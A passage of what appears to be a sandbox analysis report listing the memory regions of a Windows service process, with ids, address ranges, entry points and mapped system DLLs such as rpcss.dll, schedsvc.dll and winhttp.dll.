region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1865
start_va = 0x750000
end_va = 0x756fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000750000"
filename = ""
Region:
id = 1866
start_va = 0x7ff8d56e0000
end_va = 0x7ff8d56eefff
monitored = 0
entry_point = 0x7ff8d56e3210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 1867
start_va = 0x7ff8d73b0000
end_va = 0x7ff8d7505fff
monitored = 0
entry_point = 0x7ff8d73ba8d0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1868
start_va = 0x7ff8d6ad0000
end_va = 0x7ff8d6c55fff
monitored = 0
entry_point = 0x7ff8d6b1ffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1869
start_va = 0x580000
end_va = 0x707fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000580000"
filename = ""
Region:
id = 1870
start_va = 0x900000
end_va = 0xa80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 1871
start_va = 0xa90000
end_va = 0xb4ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 1872
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "svchost.exe.mui"
filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui")
Region:
id = 1873
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1874
start_va = 0x110000
end_va = 0x116fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1875
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1876
start_va = 0xb50000
end_va = 0xd46fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1877
start_va = 0xd50000
end_va = 0xf4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d50000"
filename = ""
Region:
id = 1878
start_va = 0xe00000
end_va = 0xefffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 1879
start_va = 0xb50000
end_va = 0xc4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1880
start_va = 0xd40000
end_va = 0xd46fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d40000"
filename = ""
Region:
id = 1881
start_va = 0x7ff8d04e0000
end_va = 0x7ff8d062cfff
monitored = 0
entry_point = 0x7ff8d0523da0
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1882
start_va = 0x7ff8d40e0000
end_va = 0x7ff8d40ebfff
monitored = 0
entry_point = 0x7ff8d40e2480
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1883
start_va = 0x7ff8d04c0000
end_va = 0x7ff8d04d7fff
monitored = 0
entry_point = 0x7ff8d04c5910
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1884
start_va = 0x7ff8d04b0000
end_va = 0x7ff8d04b9fff
monitored = 0
entry_point = 0x7ff8d04b1660
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1885
start_va = 0x7ff8d6510000
end_va = 0x7ff8d65d0fff
monitored = 0
entry_point = 0x7ff8d6530da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1886
start_va = 0xf00000
end_va = 0x1042fff
monitored = 0
entry_point = 0xf28210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1887
start_va = 0xf00000
end_va = 0x1046fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1888
start_va = 0x1050000
end_va = 0x124ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 1889
start_va = 0x1100000
end_va = 0x11fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001100000"
filename = ""
Region:
id = 1890
start_va = 0x1200000
end_va = 0x1536fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1891
start_va = 0xf00000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1892
start_va = 0x1040000
end_va = 0x1046fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 1893
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1894
start_va = 0x7ff8d65e0000
end_va = 0x7ff8d6686fff
monitored = 0
entry_point = 0x7ff8d65eb4d0
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1895
start_va = 0x710000
end_va = 0x710fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000710000"
filename = ""
Region:
id = 1896
start_va = 0x7ff8d03f0000
end_va = 0x7ff8d04aefff
monitored = 0
entry_point = 0x7ff8d0411c50
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1897
start_va = 0x1540000
end_va = 0x163ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001540000"
filename = ""
Region:
id = 1898
start_va = 0x7ff8d02f0000
end_va = 0x7ff8d03ebfff
monitored = 0
entry_point = 0x7ff8d0326df0
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1899
start_va = 0x7ff8d02a0000
end_va = 0x7ff8d02e0fff
monitored = 0
entry_point = 0x7ff8d02b7eb0
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1900
start_va = 0x7ff8d54e0000
end_va = 0x7ff8d54f8fff
monitored = 0
entry_point = 0x7ff8d54e5e10
region_type = mapped_file
name = "eventaggregation.dll"
filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll")
Region:
id = 1901
start_va = 0x760000
end_va = 0x7f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 1902
start_va = 0x1640000
end_va = 0x183ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001640000"
filename = ""
Region:
id = 1903
start_va = 0x1700000
end_va = 0x17fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001700000"
filename = ""
Region:
id = 1904
start_va = 0x7ff8d4910000
end_va = 0x7ff8d4958fff
monitored = 0
entry_point = 0x7ff8d491a090
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1905
start_va = 0x7ff8d5690000
end_va = 0x7ff8d56dafff
monitored = 0
entry_point = 0x7ff8d56935f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1906
start_va = 0x7ff8d0280000
end_va = 0x7ff8d0290fff
monitored = 0
entry_point = 0x7ff8d0283320
region_type = mapped_file
name = "wmiclnt.dll"
filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll")
Region:
id = 1907
start_va = 0x1800000
end_va = 0x18fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001800000"
filename = ""
Region:
id = 1908
start_va = 0x7ff8d5350000
end_va = 0x7ff8d537cfff
monitored = 0
entry_point = 0x7ff8d5369d40
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 1909
start_va = 0x720000
end_va = 0x720fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 1910
start_va = 0x1900000
end_va = 0x19fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 1911
start_va = 0x7ff8d5500000
end_va = 0x7ff8d5528fff
monitored = 0
entry_point = 0x7ff8d5514530
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 1912
start_va = 0x760000
end_va = 0x7dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000760000"
filename = ""
Region:
id = 1913
start_va = 0x7f0000
end_va = 0x7f6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007f0000"
filename = ""
Region:
id = 1914
start_va = 0xb50000
end_va = 0xc4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 1915
start_va = 0x7ff8d0210000
end_va = 0x7ff8d027dfff
monitored = 0
entry_point = 0x7ff8d0217f60
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1916
start_va = 0x7ff8d4b60000
end_va = 0x7ff8d4b90fff
monitored = 0
entry_point = 0x7ff8d4b67d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1917
start_va = 0x1a00000
end_va = 0x1afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001a00000"
filename = ""
Region:
id = 1918
start_va = 0xc50000
end_va = 0xccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000c50000"
filename = ""
Region:
id = 1919
start_va = 0x1b00000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 1920
start_va = 0xd50000
end_va = 0xdcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d50000"
filename = ""
Region:
id = 1921
start_va = 0x7ff8cffd0000
end_va = 0x7ff8cfffefff
monitored = 0
entry_point = 0x7ff8cffd8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1922
start_va = 0x7ff8d6ed0000
end_va = 0x7ff8d6f76fff
monitored = 0
entry_point = 0x7ff8d6ee58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1923
start_va = 0x7ff8cff00000
end_va = 0x7ff8cff0cfff
monitored = 0
entry_point = 0x7ff8cff02ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1924
start_va = 0x1050000
end_va = 0x10cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 1925
start_va = 0x7ff8d7300000
end_va = 0x7ff8d736afff
monitored = 0
entry_point = 0x7ff8d73190c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1926
start_va = 0x7ff8d4f40000
end_va = 0x7ff8d4f9bfff
monitored = 0
entry_point = 0x7ff8d4f56f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1927
start_va = 0x7ff8cfe50000
end_va = 0x7ff8cfe91fff
monitored = 0
entry_point = 0x7ff8cfe527d0
region_type = mapped_file
name = "mstask.dll"
filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")
Region:
id = 1928
start_va = 0x720000
end_va = 0x721fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000720000"
filename = ""
Region:
id = 1929
start_va = 0x1c00000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c00000"
filename = ""
Region:
id = 1930
start_va = 0x7ff8cf970000
end_va = 0x7ff8cf9c4fff
monitored = 0
entry_point = 0x7ff8cf97fc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1931
start_va = 0x7ff8d5670000
end_va = 0x7ff8d5683fff
monitored = 0
entry_point = 0x7ff8d56752e0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 1932
start_va = 0x730000
end_va = 0x730fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 1933
start_va = 0x7ff8cf790000
end_va = 0x7ff8cf7b6fff
monitored = 0
entry_point = 0x7ff8cf793bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1934
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1935
start_va = 0x7ff8d8ff0000
end_va = 0x7ff8d904bfff
monitored = 0
entry_point = 0x7ff8d900b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1936
start_va = 0x7ff8d7a90000
end_va = 0x7ff8d8feefff
monitored = 0
entry_point = 0x7ff8d7bf11f0
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1937
start_va = 0x7ff8d6180000
end_va = 0x7ff8d61c2fff
monitored = 0
entry_point = 0x7ff8d6194b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1938
start_va = 0x7ff8d5700000
end_va = 0x7ff8d5d43fff
monitored = 0
entry_point = 0x7ff8d58c64b0
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 1939
start_va = 0x7ff8d6450000
end_va = 0x7ff8d64a1fff
monitored = 0
entry_point = 0x7ff8d645f530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1940
start_va = 0x7ff8d4dd0000
end_va = 0x7ff8d4deefff
monitored = 0
entry_point = 0x7ff8d4dd5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1941
start_va = 0x7ff8d4a80000
end_va = 0x7ff8d4a8bfff
monitored = 0
entry_point = 0x7ff8d4a827e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1942
start_va = 0x7ff8d5e40000
end_va = 0x7ff8d5ef4fff
monitored = 0
entry_point = 0x7ff8d5e822e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 1943
start_va = 0x7ff8cf720000
end_va = 0x7ff8cf75dfff
monitored = 0
entry_point = 0x7ff8cf72a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1944
start_va = 0x7ff8cf710000
end_va = 0x7ff8cf71afff
monitored = 0
entry_point = 0x7ff8cf711770
region_type = mapped_file
name = "lfsvc.dll"
filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll")
Region:
id = 1945
start_va = 0x7ff8d0000000
end_va = 0x7ff8d0091fff
monitored = 0
entry_point = 0x7ff8d004a780
region_type = mapped_file
name = "msvcp110_win.dll"
filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll")
Region:
id = 1946
start_va = 0x1e00000
end_va = 0x1edcfff
monitored = 0
entry_point = 0x1e5e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1947
start_va = 0x7ff8cf590000
end_va = 0x7ff8cf70bfff
monitored = 0
entry_point = 0x7ff8cf5e1650
region_type = mapped_file
name = "locationframework.dll"
filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll")
Region:
id = 1948
start_va = 0x7ff8d6280000
end_va = 0x7ff8d6446fff
monitored = 0
entry_point = 0x7ff8d62ddb80
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 1949
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1950
start_va = 0x7ff8d3f20000
end_va = 0x7ff8d3f5ffff
monitored = 0
entry_point = 0x7ff8d3f31960
region_type = mapped_file
name = "brokerlib.dll"
filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll")
Region:
id = 1951
start_va = 0x7ff8d56f0000
end_va = 0x7ff8d56fffff
monitored = 0
entry_point = 0x7ff8d56f56e0
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 1952
start_va = 0x7ff8cf520000
end_va = 0x7ff8cf580fff
monitored = 0
entry_point = 0x7ff8cf524b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1953
start_va = 0x7ff8d0160000
end_va = 0x7ff8d0195fff
monitored = 0
entry_point = 0x7ff8d0170070
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1954
start_va = 0x7ff8cf450000
end_va = 0x7ff8cf517fff
monitored = 0
entry_point = 0x7ff8cf4913f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1955
start_va = 0x7ff8d3db0000
end_va = 0x7ff8d3dc2fff
monitored = 0
entry_point = 0x7ff8d3db2760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1956
start_va = 0x7ff8d51a0000
end_va = 0x7ff8d51f5fff
monitored = 0
entry_point = 0x7ff8d51b0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1957
start_va = 0x7ff8d4670000
end_va = 0x7ff8d4693fff
monitored = 0
entry_point = 0x7ff8d4673260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1958
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1959
start_va = 0x7ff8cf360000
end_va = 0x7ff8cf445fff
monitored = 0
entry_point = 0x7ff8cf37cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1960
start_va = 0x7ff8d1550000
end_va = 0x7ff8d1685fff
monitored = 0
entry_point = 0x7ff8d157f350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1961
start_va = 0x7ff8cfef0000
end_va = 0x7ff8cfefffff
monitored = 0
entry_point = 0x7ff8cfef2c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1962
start_va = 0x7ff8cf350000
end_va = 0x7ff8cf35bfff
monitored = 0
entry_point = 0x7ff8cf3514d0
region_type = mapped_file
name = "locationframeworkps.dll"
filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll")
Region:
id = 1963
start_va = 0x740000
end_va = 0x740fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 1964
start_va = 0x2000000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1965
start_va = 0x740000
end_va = 0x740fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 1966
start_va = 0x7ff8cf300000
end_va = 0x7ff8cf340fff
monitored = 0
entry_point = 0x7ff8cf304840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1967
start_va = 0x7ff8cf2e0000
end_va = 0x7ff8cf2fffff
monitored = 0
entry_point = 0x7ff8cf2e39a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 1968
start_va = 0x7ff8d4090000
end_va = 0x7ff8d40b6fff
monitored = 0
entry_point = 0x7ff8d4097940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1969
start_va = 0x7ff8d3b80000
end_va = 0x7ff8d3b87fff
monitored = 0
entry_point = 0x7ff8d3b813e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1970
start_va = 0x740000
end_va = 0x740fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000740000"
filename = ""
Region:
id = 1971
start_va = 0x7ff8cf2a0000
end_va = 0x7ff8cf2d6fff
monitored = 0
entry_point = 0x7ff8cf2a6020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 1972
start_va = 0x7ff8cf240000
end_va = 0x7ff8cf294fff
monitored = 0
entry_point = 0x7ff8cf243fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 1975
start_va = 0x7ff8ceff0000
end_va = 0x7ff8cf005fff
monitored = 0
entry_point = 0x7ff8ceff1b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1976
start_va = 0x7ff8cefc0000
end_va = 0x7ff8cefedfff
monitored = 0
entry_point = 0x7ff8cefc7550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1977
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1978
start_va = 0x7ff8cef20000
end_va = 0x7ff8cef39fff
monitored = 0
entry_point = 0x7ff8cef22cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 1979
start_va = 0x7ff8d71b0000
end_va = 0x7ff8d72f2fff
monitored = 0
entry_point = 0x7ff8d71d8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1980
start_va = 0x7ff8d5150000
end_va = 0x7ff8d5170fff
monitored = 0
entry_point = 0x7ff8d5160250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1981
start_va = 0x7ff8cef00000
end_va = 0x7ff8cef12fff
monitored = 0
entry_point = 0x7ff8cef057f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1982
start_va = 0x2200000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1983
start_va = 0x7ff8ceee0000
end_va = 0x7ff8ceef0fff
monitored = 0
entry_point = 0x7ff8ceee7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 1984
start_va = 0x7ff8ceeb0000
end_va = 0x7ff8ceed4fff
monitored = 0
entry_point = 0x7ff8ceec2f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1985
start_va = 0x7ff8cee70000
end_va = 0x7ff8ceea8fff
monitored = 0
entry_point = 0x7ff8cee79c90
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1986
start_va = 0x7ff8cee50000
end_va = 0x7ff8cee60fff
monitored = 0
entry_point = 0x7ff8cee53e10
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1987
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1988
start_va = 0x7ff8d11c0000
end_va = 0x7ff8d1541fff
monitored = 0
entry_point = 0x7ff8d1211220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1989
start_va = 0x7ff8cee30000
end_va = 0x7ff8cee46fff
monitored = 0
entry_point = 0x7ff8cee35630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1990
start_va = 0x7e0000
end_va = 0x7e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007e0000"
filename = ""
Region:
id = 1991
start_va = 0x7ff8ced70000
end_va = 0x7ff8cee20fff
monitored = 0
entry_point = 0x7ff8cede88b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1992
start_va = 0x7ff8cee90000
end_va = 0x7ff8ceea1fff
monitored = 0
entry_point = 0x7ff8cee99260
region_type = mapped_file
name = "rilproxy.dll"
